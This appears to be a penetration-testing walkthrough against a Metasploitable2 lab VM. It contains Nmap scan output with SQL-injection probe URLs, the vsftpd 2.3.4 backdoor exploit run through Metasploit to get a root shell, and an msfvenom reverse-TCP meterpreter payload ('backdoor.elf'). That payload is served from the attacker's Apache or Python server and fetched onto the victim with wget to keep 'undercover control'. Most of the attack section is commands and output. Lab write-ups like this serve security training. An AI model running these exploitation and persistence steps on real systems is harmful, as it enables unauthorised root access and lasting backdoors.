|     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
|     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider&page=pen-test-tool-lookup.php
|     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider&page=pen-test-tool-lookup.php
|     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
|     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
|     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
|   Possible sqli for forms:
|     Form at path: /mutillidae/index.php, form's action: index.php. Fields that might be vulnerable:
|       choice
|       choice
|       choice
|       choice
|       choice
|       choice
|       choice
|       choice
|       choice
|       choice
|       choice
|       choice
|_      initials
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
| rmi-vuln-classloader: 
|   VULNERABLE:
|   RMI registry default configuration remote code execution vulnerability
|     State: VULNERABLE
|       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
|       
|     References:
|_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
5432/tcp open  postgresql
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140605.txt
|       http://www.cvedetails.com/cve/2014-0224
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_      https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown: 
5900/tcp open  vnc
|_sslv2-drown: 
6000/tcp open  X11
6667/tcp open  irc
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
8009/tcp open  ajp13
8180/tcp open  unknown
| http-cookie-flags: 
|   /admin/: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/index.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/login.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/account.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin_login.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/home.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin-login.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/adminLogin.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/controlpanel.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/cp.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/index.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/login.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/home.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/controlpanel.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin-login.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/cp.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/account.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin_login.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/adminLogin.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/jscript/upload.html: 
|     JSESSIONID: 
|_      httponly flag not set
| http-enum: 
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /admin/login.html: Possible admin folder
|   /admin/admin.html: Possible admin folder
|   /admin/account.html: Possible admin folder
|   /admin/admin_login.html: Possible admin folder
|   /admin/home.html: Possible admin folder
|   /admin/admin-login.html: Possible admin folder
|   /admin/adminLogin.html: Possible admin folder
|   /admin/controlpanel.html: Possible admin folder
|   /admin/cp.html: Possible admin folder
|   /admin/index.jsp: Possible admin folder
|   /admin/login.jsp: Possible admin folder
|   /admin/admin.jsp: Possible admin folder
|   /admin/home.jsp: Possible admin folder
|   /admin/controlpanel.jsp: Possible admin folder
|   /admin/admin-login.jsp: Possible admin folder
|   /admin/cp.jsp: Possible admin folder
|   /admin/account.jsp: Possible admin folder
|   /admin/admin_login.jsp: Possible admin folder
|   /admin/adminLogin.jsp: Possible admin folder
|   /manager/html/upload: Apache Tomcat (401 Unauthorized)
|   /manager/html: Apache Tomcat (401 Unauthorized)
|   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
|   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
|   /admin/jscript/upload.html: Lizard Cart/Remote File upload
|_  /webdav/: Potentially interesting folder
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 330.59 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$

    The above output shows the list of vulnerabilities and they are as follows:

    actually with the below output result and we will do vulnerability analysis via FTP (vsftpd service)



    PORT     STATE SERVICE
21/tcp   open  ftp
| ftp-vsftpd-backdoor: 
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|_sslv2-drown:



    The attack Procedure


    we can see that the vulnerability was allegedly added to the vsftpd archive between the dates mentioned in the description of the module.

    The concept of the attack on VSFTPD 2.3.4 is to trigger the malicious execution, results in opening the backdoor on port 6200 of the system.



    Let's Exploiting


    The following result of the vulnerabole sourece code will make things much clearer: 



    -    else if((p_str->p_buf[i]==0x3a)
-    && (p_str->p_buf[i+1]==0x29))
-    {
-      vsf_sysutil_extra();
-    }
   }



     

    We can clearly see that if the bytes in the network buffer match the backdoor sequence of 0x3a (colon) and 0x29, the malicious function is triggered. 

    Furthermore, is we explore the details of the malicious function, we can see the following function definition for the malicious function:




    Click Here For More Info - https://pastebin.com/AetT9sS5




    sa.sin_port=6200 serves as the backdoor port and all the commands sent to the service get executed using the execl("/bin/sh","sh",(char *)0); function.



    Vulnerability analysis of VSFTPD 2.3.4 backdoor


    After modeling threats, let us load the matching module into Metasploit using the use exploit/unix/ftp/vsftpd_234_backdoor command and analyze the vulnerability details using info command as follows:



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo msfconsole -q                                                                                                       
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.
msf6 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > 
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] Using configured payload cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info 

       Name: VSFTPD v2.3.4 Backdoor Command Execution
     Module: exploit/unix/ftp/vsftpd_234_backdoor
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-07-03

Provided by:
  hdm 
  MC 

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
  RPORT   21               yes       The target port (TCP)

Payload information:
  Space: 2000
  Avoid: 0 characters

Description:
  This module exploits a malicious backdoor that was added to the 
  VSFTPD download archive. This backdoor was introduced into the 
  vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 
  according to the most recent information available. This backdoor 
  was removed on July 3rd 2011.

References:
  OSVDB (73573)
  http://pastebin.com/AetT9sS5
  http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >




    Now we are going to add RHOST, RPORT, show payload, use payload and check about these options & finally we will exploit...

    We can see that the vulnerability was allegedly added to the vsftpd archive between the dates mentioned in the description of the module.



    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
RHOST => 192.168.43.120
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
RPORT => 21
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   #  Name                       Disclosure Date  Rank    Check  Description
   -  ----                       ---------------  ----    -----  -----------
   0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >



    And as you can after exploiting we can do many things but one thing is that one problem here and problem is how to maintain accessability with these exploitation because after exit from the exploitation then it will destroy the session and after that we have to exploit again to get access or run the command



    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.43.120:21 - USER: 331 Please specify the password.
[+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
[+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530

whoami
root
pwd
/

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

ls -la
total 125
drwxr-xr-x  21 root root  4096 May 20  2012 .
drwxr-xr-x  21 root root  4096 May 20  2012 ..
drwxr-xr-x   2 root root  4096 May 13  2012 bin
drwxr-xr-x   4 root root  1024 May 13  2012 boot
lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
drwxr-xr-x  14 root root 13500 Jul  9 13:48 dev
drwxr-xr-x  94 root root  4096 Jul  9 14:41 etc
drwxr-xr-x   7 root root  4096 Jun  2 05:32 home
drwxr-xr-x   2 root root  4096 Mar 16  2010 initrd
lrwxrwxrwx   1 root root    32 Apr 28  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x  13 root root  4096 May 13  2012 lib
drwx------   2 root root 16384 Mar 16  2010 lost+found
drwxr-xr-x   4 root root  4096 Mar 16  2010 media
drwxr-xr-x   3 root root  4096 Apr 28  2010 mnt
-rw-------   1 root root 41871 Jul  9 13:49 nohup.out
drwxr-xr-x   2 root root  4096 Mar 16  2010 opt
dr-xr-xr-x 118 root root     0 Jul  9 13:48 proc
drwxr-xr-x  13 root root  4096 Jul  9 13:49 root
drwxr-xr-x   2 root root  4096 May 13  2012 sbin
drwxr-xr-x   2 root root  4096 Mar 16  2010 srv
drwxr-xr-x  12 root root     0 Jul  9 13:48 sys
drwxrwxrwt   4 root root  4096 Jul  9 14:07 tmp
drwxr-xr-x  12 root root  4096 Apr 28  2010 usr
drwxr-xr-x  14 root root  4096 Mar 17  2010 var
lrwxrwxrwx   1 root root    29 Apr 28  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server



    Post Exploitation

    After gaining knowledge about this vulnerability and gaining access, let us now exploit once again because we want to access of this vuln to maintain and undercover control in ownself. Let us now exploit the target system. Let us see what options we need to set before firing the exploit onto the target. we can do this by running the show options command, as shown following..




    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
RHOST => 192.168.43.120
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
RPORT => 21
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

   #  Name                       Disclosure Date  Rank    Check  Description
   -  ----                       ---------------  ----    -----  -----------
   0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
payload => cmd/unix/interact




    We can see that we have only two options, which are RHOST and RPORT, we set RHOST as the IP address of the target and RPORT as 21, which is the port of the vulnerable FTP server.


    Next we can check for the matching payloads via the show payloads command to see what payloads are suitable for this particular exploit module.we can see only a single payload which is payload/cmd/unix/interact. We can use this payload using the set payload cmd/unix/interact command.




    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.43.120:21 - USER: 331 Please specify the password.
[+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
[+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530

whoami
root
pwd
/



    Vola!! we got it we goot root access to the target system. So, what's next? Since wehave got a simple shell, let us try gaining better control over the target by spawning a meterpreter shell.


    In order to maintain the access and meterpreter shell, we need to create a client-oriented payload, upload it to the target system, and execute it. so, lets get started....

     

    sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf

    This is own IP 192.168.43.152...




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ ls
ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt  vuln.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf                 
[sudo] password for hackerboy: 
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ ls                             
backdoor.elf  ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt  vuln.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$



    We can use a great utility called msfvenom to generate a meterpreter payload, as shown in the preceding screenshot. The -p switch defines the payload to use, while LHOST and LPORT define our IP address and port number that backdoor.elf file will connect to in order to provide us meterpreter access to the target. The -f switch defines the ourput type, and elf is the default extension for the linux-based systems.

     

    But what happend next, shall we go to our victim's system and do post-exploitation? No, nothing like this is going to happen, we will maintain access to materpreter shell through exploit and if you say, with the help of apache server on our system, we will upload the shell to the victim's system.

     

    If your Victim is on another network means away from you, then we can buy and host a server for this and then upload it onto the target machine.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo service apache2 start                                                                              
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo mv backdoor.elf /var/www/html/                                                                                      
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$



    We run the apache service via the service apache2 start command and move the backdoor file into the default document root directory of the Apache server. Let us now download the file from our Apache server onto the victim system.


    whoami
root
pwd
/


wget http://192.168.43.152/backdoor.elf       
--16:06:29--  http://192.168.43.152/backdoor.elf
           => `backdoor.elf'
Connecting to 192.168.43.152:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207

    0K                                                       100%    7.65 MB/s

16:06:29 (7.65 MB/s) - `backdoor.elf' saved [207/207]


    We can download the file via the wget command, as shown in the preceding screenshot. Now, in order to allow the victim system to communicate with Metasploit, we need to set up an exploit handler on our system. The handler will allow communication between the target and Metasploit using the same port and payload we used in the backdoor.elf file.



    OR (2nd method to upload a backdoor file in our victim machine)

     

    We can upload a backdoor in our victim's machine by python's http.server..like this


      

    ┌──(hackerboy㉿KumarAtulJaiswal)-[/var/www/html/backdoor]
└─$ python3 -m http.server 1234                                                                                                   1 ⨯
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
192.168.43.120 - - [10/Jul/2021 01:36:03] "GET /backdoor.elf HTTP/1.0" 200 - 
     
     

     

    and after then, in out victim's machine , we get a backdoor file via wget  command :-



    whoami
root
pwd
/

wget http://127.0.0.1/backdoor.elf

